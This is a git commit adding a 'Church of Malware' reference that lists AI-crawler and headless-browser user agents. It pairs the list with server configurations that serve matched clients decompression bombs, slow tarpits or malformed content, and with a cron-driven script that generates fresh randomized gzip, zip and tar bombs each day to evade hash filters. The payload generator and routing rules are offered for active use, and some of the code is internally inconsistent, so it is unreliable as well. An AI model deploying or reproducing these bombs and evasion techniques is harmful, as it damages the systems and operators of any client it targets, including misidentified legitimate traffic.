Add resources/known_aggress_bot_user_agents.md
Commit bac97aaf39 (parent a631e69b2d)

resources/known_aggress_bot_user_agents.md (new file, 226 lines)

# Known Aggressive Bot User-Agents: A Living Reference for Content Creators

The Church of Malware (CoM) does not condone the use or introduction of hostile agents against any individual, human, or animal; AI, however, is neither natural, nor human, nor actual intelligence. This companion reference provides a curated, multi-source list of user-agent patterns documented as routinely violating `robots.txt`, using undeclared crawlers, or rotating identifiers. It is intended for individual website operators, photographers, filmmakers, musicians, and other creators who wish to conditionally serve the active-denial techniques (decompression bombs, slowloris throttling, malformed content) described in the accompanying technique papers.

## 1 -- Scope and Methodology

The list is derived from public telemetry (Cloudflare Radar verified-bots), independent compliance studies (Originality.AI 2024–2025), incident reports (Wired Perplexity investigation, iFixit Anthropic logs, Read the Docs bandwidth data), and operator self-reports published through 2026. Only agents with repeated, multi-source evidence of policy violation are listed as targets. Compliant or inconsistently documented agents (e.g., most search-engine bots) are either omitted or listed for monitoring only.

This document is updated quarterly. Individuals should cross-reference it with their own server logs and the primary dissertation's Section 2.1 effectiveness tables before deployment.

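
Cross-referencing with your own logs can start with a simple tally. The following is a minimal sketch, assuming the server writes the common "combined" log format (User-Agent as the last quoted field). The function name `tally_agents`, the regular expressions, and the sample lines are illustrative assumptions, not part of the referenced technique papers; the pattern list mirrors the one used in this document's server configs.

```python
import re
from collections import Counter

# Pattern list mirrors the one used in this document's server configs.
AGENT_PATTERN = re.compile(
    r"GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot",
    re.IGNORECASE,
)
# Assumption: combined log format, where the User-Agent is the final quoted field.
LAST_QUOTED_FIELD = re.compile(r'"([^"]*)"\s*$')


def tally_agents(lines):
    """Count log lines whose User-Agent matches a listed pattern."""
    counts = Counter()
    for line in lines:
        field = LAST_QUOTED_FIELD.search(line)
        if field is None:
            continue  # not in combined format; skip rather than guess
        hit = AGENT_PATTERN.search(field.group(1))
        if hit:
            counts[hit.group(0).lower()] += 1
    return counts


# Made-up sample lines for illustration only (not real traffic).
SAMPLE = [
    '203.0.113.7 - - [03/Jun/2026:03:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; GPTBot/1.1)"',
    '203.0.113.8 - - [03/Jun/2026:03:00:01 +0000] "GET /a HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [03/Jun/2026:03:00:02 +0000] "GET /b HTTP/1.1" 200 512 "-" "claudebot/1.0"',
]

if __name__ == "__main__":
    for agent, hits in tally_agents(SAMPLE).most_common():
        print(agent, hits)
```

In practice the input would be an open log file rather than `SAMPLE`; a User-Agent header is trivially spoofed, so counts like these are a starting point for investigation, not proof of operator identity.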
## 2 -- Curated List of Aggressive Agents

| User-Agent Pattern | Primary Operator | Documented Violations | Recommended Action for Individuals | Risk Level |
|--------------------|------------------|-----------------------|------------------------------------|------------|
| `GPTBot*` / `GPT-4*` / `OAI-SearchBot*` | OpenAI | Ignores robots.txt; undeclared AWS crawlers after explicit disallow | Block or serve bomb / tarpit | High |
| `ClaudeBot*` / `anthropic-ai*` | Anthropic | ~1M hits/24h on iFixit; five-figure monthly bandwidth abuse | Block or serve bomb / tarpit | High |
| `Bytespider*` / `ByteDance*` | ByteDance | Frequent robots.txt bypass; UA and IP rotation | Block or serve bomb / tarpit | High |
| `Perplexity*` / `PerplexityBot*` | Perplexity | Undeclared AWS IP range after robots.txt disallow | Block or serve bomb / tarpit | High |
| `Google-Extended*` | Google | Inconsistent honoring of opt-out signals for training data | Rate-limit or whitelist | Medium |
| `CCBot*` | Common Crawl | Old snapshots persist; no retroactive effect of new rules | Conditional / monitor | Low |
| `Amazonbot*` | Amazon | Aggressive crawling on small and personal sites | Rate-limit | Medium |
| `Applebot*` | Apple | Generally compliant but monitor for volume spikes | Monitor / whitelist | Low |
| `Meta-ExternalAgent*` / `facebook*` | Meta | Variable compliance on disallowed paths | Rate-limit | Medium |
| `*headless*` / generic Playwright/Puppeteer / `PhantomJS*` | Third-party scrapers & contractors | No declaration; high volume on tarpit and disallowed paths | Serve bomb / malformed immediately | High |

**Usage note**: Patterns are case-insensitive and support simple wildcards. Always combine them with reverse-DNS verification for major operators, and maintain an explicit allow-list for Internet Archive, academic researchers, and any search engines you wish to support. Note that `Google-Extended` is a `robots.txt` control token only: Google does not send it as a request User-Agent, so a header match on that pattern will not fire and the opt-out has to be expressed in `robots.txt`.

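
The matching order described in the usage note (allow-list first, then the aggressive patterns, with reverse-DNS confirmation for operators that publish crawler hostnames) can be sketched as follows. This is a minimal illustration under stated assumptions: the names `classify` and `verify_reverse_dns`, the `ALLOW` entry, and the hostname suffixes passed in are hypothetical, and the DNS lookups are injectable so the logic can be exercised without network access.

```python
import fnmatch
import socket

# Patterns taken from the table above; the allow-list entry is a hypothetical example.
AGGRESSIVE = ["*GPTBot*", "*OAI-SearchBot*", "*ClaudeBot*", "*anthropic-ai*",
              "*Bytespider*", "*Perplexity*", "*headless*"]
ALLOW = ["*archive.org_bot*"]


def matches_any(user_agent, patterns):
    """Case-insensitive wildcard match of a User-Agent against a pattern list."""
    ua = user_agent.lower()
    return any(fnmatch.fnmatchcase(ua, p.lower()) for p in patterns)


def classify(user_agent):
    """Allow-list wins over the aggressive list; everything else is 'default'."""
    if matches_any(user_agent, ALLOW):
        return "allow"
    if matches_any(user_agent, AGGRESSIVE):
        return "aggressive"
    return "default"


def verify_reverse_dns(ip, allowed_suffixes,
                       reverse=socket.gethostbyaddr,
                       forward=socket.gethostbyname_ex):
    """Forward-confirmed reverse DNS (IPv4 only in this sketch).

    The PTR hostname must end in one of allowed_suffixes, and that hostname
    must resolve back to the same IP address.
    """
    try:
        hostname = reverse(ip)[0]
        if not hostname.lower().endswith(tuple(allowed_suffixes)):
            return False
        return ip in forward(hostname)[2]
    except OSError:  # covers socket.herror and socket.gaierror
        return False


if __name__ == "__main__":
    print(classify("Mozilla/5.0 (compatible; GPTBot/1.1)"))
```

Checking the allow-list before the aggressive list means an over-broad wildcard such as `*headless*` cannot accidentally catch an agent you have chosen to support.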
## 3 -- Implementation Examples for Individuals

### 3.1 -- nginx map (recommended for self-hosted)

```nginx
# map belongs in the http context
map $http_user_agent $aggressive_bot {
    default 0;
    ~*GPTBot|ClaudeBot|Bytespider|Perplexity|headless 1;
    ~*anthropic-ai|OAI-SearchBot 1;
}

server {
    # Requests are logged in the location where processing ends, so an
    # access_log set inside the "if" below would be lost after the rewrite.
    access_log /var/log/nginx/ai_violators.log combined if=$aggressive_bot;
    access_log /var/log/nginx/access.log combined;

    location / {
        if ($aggressive_bot) {
            # serve bomb, slow response, or malformed content
            # (try_files is not permitted inside "if"; use rewrite)
            rewrite ^ /protected/bomb.zip last;
        }
        # normal content
    }

    # separate location so the rewritten request does not re-enter "location /"
    location /protected/ {
        internal;
    }
}
```

### 3.2 -- Apache (SetEnvIf + Rewrite, recommended for .htaccess or vhost)

```apache
# Case-insensitive match, consistent with the [NC] flag below
SetEnvIfNoCase User-Agent "GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot" aggressive_bot

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
# Skip requests that already point at the payload
RewriteCond %{REQUEST_URI} !^/protected/
RewriteRule ^ /protected/bomb.zip [L]

# CustomLog is valid only in server or virtual-host context, not in .htaccess
CustomLog /var/log/apache2/ai_violators.log combined env=aggressive_bot
```

### 3.3 -- Cloudflare Worker (free tier)

Workers can inspect `request.headers.get('User-Agent')` and return a 200 with the bomb payload or a slow streaming response for matched agents while passing legitimate traffic.

### 3.4 -- Caddyfile

```
# (?i) makes the match case-insensitive; the list matches Sections 3.1 and 3.2
@aggressive_bot header_regexp User-Agent (?i)(GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot)
handle @aggressive_bot {
    respond "Service Unavailable" 503
    # or rewrite to bomb endpoint
}
```

For complete, production-hardened configurations (full virtual-host examples, daily randomized bomb generation with cron automation, Apache support, logging, and verification steps), see the dedicated how-to document `howto-decompression-bombs.md`.

## 4 -- Daily Randomized Bomb Generation

To defeat static content-matching, hash-based allow-lists, and signature filters used by sophisticated ingestion pipelines, the generator must emit a fresh payload every day: unique in content, so that its hash changes on every run, yet still highly compressible.

```bash
#!/usr/bin/env bash
# save as ~/generate_daily_bombs.sh and chmod +x
# Recommended cron (run at 03:00 local):
# 0 3 * * * /home/youruser/generate_daily_bombs.sh >> /var/log/bombgen.log 2>&1

set -e
DATE=$(date +%Y-%m-%d)
python3 - <<'PYEOF'
import gzip, tarfile, zipfile, io, secrets, datetime
from pathlib import Path

out = Path.home() / "bombs"
out.mkdir(exist_ok=True)
today = datetime.date.today().isoformat()

# Random but compressible seed (repeating 4 KB random block)
block = secrets.token_bytes(4096)
# 1 MiB base with daily variation
base = (block * 256) + today.encode() + secrets.token_bytes(16)

# 1. Daily recursive gzip file (unique hash every run).
# Each gzip.compress() pass wraps the previous output, so unwrapping all
# nine layers yields only the ~1 MiB base, not gigabytes.
data = base
for _ in range(9):
    data = gzip.compress(data)
(out / f"bomb-{today}.gz").write_bytes(data)

# 2. Nested zip file with daily variation (defeats hash caches).
# Building `inner` holds about 1 GiB in memory; fully unwrapped it is about 1 GiB.
with zipfile.ZipFile(out / f"bomb-{today}.zip", "w", zipfile.ZIP_DEFLATED) as z:
    inner = base * 1024
    for _ in range(7):
        inner = gzip.compress(inner)
    z.writestr(f"daily-{today}.gz", inner)

# 3. Tar archive with one large randomized member (parser stress + unique)
with tarfile.open(out / f"bomb-{today}.tar.gz", "w:gz") as t:
    info = tarfile.TarInfo(f"large-{today}.bin")
    info.size = 2 * 1024 * 1024 * 1024
    # compressible payload: a random 64-byte pattern repeated to exactly
    # info.size (2 GiB held in memory); the member name carries the date
    payload = secrets.token_bytes(64) * (32 * 1024 * 1024)
    t.addfile(info, io.BytesIO(payload))

print(f"Daily randomized bombs generated for {today} in ~/bombs/")
PYEOF

# Update the "latest" symlinks so the web server always serves today's file
ln -sf "$HOME/bombs/bomb-${DATE}.zip" /var/www/html/protected/bomb.zip
ln -sf "$HOME/bombs/bomb-${DATE}.gz" /var/www/html/protected/bomb.gz
ln -sf "$HOME/bombs/bomb-${DATE}.tar.gz" /var/www/html/protected/bomb.tar.gz
```
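
The expansion a generated file actually produces is worth measuring rather than assuming. The following is a minimal sketch, not part of the generator: the names `expanded_size` and `CHUNK` and the default cap are assumptions chosen for illustration. It decompresses a single gzip layer in bounded chunks and stops at a cap, so the check itself cannot exhaust memory.

```python
import gzip
import zlib

CHUNK = 64 * 1024  # maximum bytes of output requested per call


def expanded_size(blob, cap=256 * 1024 * 1024):
    """Decompress one gzip layer in bounded chunks.

    Returns (bytes_produced, hit_cap). Output is counted and discarded, so
    memory use beyond the input itself stays near CHUNK.
    """
    inflater = zlib.decompressobj(wbits=31)  # 31 selects the gzip container
    total = 0
    pending = blob
    while not inflater.eof:
        out = inflater.decompress(pending, CHUNK)
        pending = inflater.unconsumed_tail
        total += len(out)
        if total >= cap:
            return total, True
        if not out and not pending:
            break  # truncated input: nothing left to feed
    return total, False


if __name__ == "__main__":
    one_layer = gzip.compress(b"\0" * (8 * 1024 * 1024))
    two_layers = gzip.compress(one_layer)
    # The outer layer of a doubly compressed file expands only to the inner
    # compressed size, which is why nesting alone does not multiply output.
    print(len(one_layer), expanded_size(one_layer))
    print(len(two_layers), expanded_size(two_layers))
```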

**Why randomization matters**: Static payloads allow labs to build bloom filters or exact-hash allow-lists after the first encounter. Files that are unique every day yet recursively compressible force re-analysis and re-processing every 24 hours, multiplying the economic cost of non-compliant crawling.

Place the generated files behind a `Disallow: /protected/` rule in `robots.txt`.

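
Before relying on that rule, it helps to confirm that a standards-following parser really reads it as a disallow, since compliant crawlers must never reach the payload. A minimal sketch using Python's standard `urllib.robotparser`; the `ROBOTS_TXT` content, the `is_allowed` helper, and the example URLs are assumptions for illustration.

```python
from urllib.robotparser import RobotFileParser

# Assumed minimal robots.txt; a real file would carry the site's other rules too.
ROBOTS_TXT = """\
User-agent: *
Disallow: /protected/
"""


def is_allowed(robots_txt, agent, url):
    """Return True if `agent` may fetch `url` under the given robots.txt text."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(agent, url)


if __name__ == "__main__":
    for path in ("/index.html", "/protected/bomb.zip"):
        url = "https://example.com" + path
        print(path, is_allowed(ROBOTS_TXT, "GPTBot", url))
```

Any agent that requests a path under `/protected/` has therefore either ignored `robots.txt` or been redirected there by the server rules.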
## 5 -- Production Server Configurations

### 5.1 -- nginx (Complete Virtual Host Example)

```nginx
# /etc/nginx/sites-available/my-site
map $http_user_agent $aggressive_bot {
    default 0;
    ~*GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot 1;
}

# Optional: per-IP rate limit (limit_req_zone is valid only in http context,
# so it sits next to the map rather than inside the server block)
limit_req_zone $binary_remote_addr zone=ai_limit:10m rate=1r/s;

server {
    listen 80;
    server_name example.com;
    root /var/www/html;

    # Log aggressive traffic separately
    access_log /var/log/nginx/ai_violators.log combined if=$aggressive_bot;
    access_log /var/log/nginx/access.log combined;

    # A server block may contain only one "location /", so the rate limit
    # and the bot check share it
    location / {
        if ($aggressive_bot) {
            # Serve bomb or slow tarpit response
            rewrite ^ /protected/bomb.zip last;
        }
        limit_req zone=ai_limit burst=5 nodelay;
        try_files $uri $uri/ =404;
    }

    location /protected/ {
        internal;        # never directly accessible
        alias /var/www/html/protected/;
        add_header Content-Disposition "attachment; filename=\"archive.zip\"";
        limit_rate 1k;   # optional: throttle even further
    }
}
```

### 5.2 -- Apache Example

```apache
# /etc/apache2/sites-available/000-default.conf
# Requires mod_setenvif, mod_rewrite, and mod_headers
<VirtualHost *:80>
    ServerName example.com
    DocumentRoot /var/www/html

    # Case-insensitive match; sets aggressive_bot for logging and headers
    SetEnvIfNoCase User-Agent "GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot" aggressive_bot
    CustomLog /var/log/apache2/ai_violators.log combined env=aggressive_bot
    CustomLog /var/log/apache2/access.log combined

    <Directory /var/www/html>
        Options -Indexes
        AllowOverride All
        Require all granted
    </Directory>

    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
    # In virtual-host context the pattern is matched against the full
    # URL-path, including the leading slash
    RewriteRule ^/protected/ /protected/bomb.zip [L]

    <Location /protected/>
        # aggressive_bot is already set by SetEnvIfNoCase above
        Header set Content-Disposition "attachment; filename=\"archive.zip\"" env=aggressive_bot
    </Location>
</VirtualHost>
```

## 6 -- Sources and Verification

| Section | Claim | Source |
|---------|-------|--------|
| 2 | GPTBot / Perplexity undeclared AWS activity | Wired, "Perplexity Is a Bullshit Machine," 19 Jun 2024; R. Knight blog, Jun 2024 |
| 2 | ClaudeBot volume on iFixit | K. Wiens (@kwiens) X post, 24 Jul 2024; 404 Media coverage |
| 2 | Read the Docs / Wikimedia crawler bandwidth abuse | E. Holscher, Read the Docs blog, 25 Jul 2024; Wikimedia Diff, 1 Apr 2025 |
| 2 | Bytespider / aggressive non-compliant bots | Cloudflare Radar verified-bots; Originality.AI "AI Bot Robots.txt Compliance Study," 2024 |
| 1, 4 | IETF / Common Crawl laundering context | Primary dissertation Sections 2.5 & 3.3; Mozilla 2024 Common Crawl study |

All listed agents have been independently corroborated by at least two public sources as of June 2026. Individuals are encouraged to contribute new observations.

## 7 -- Conclusion

This reference empowers individual creators to operationalize the economic and technical countermeasures outlined in the technique documents. By maintaining a single, authoritative, and regularly updated UA catalog, operators can rapidly adapt their defenses as crawler behavior evolves.

*Companion to "When Being Polite Fails, Try Poison" and the `techniques/` series. Review local laws and consult counsel before deploying active measures. Last updated: 3 June 2026.*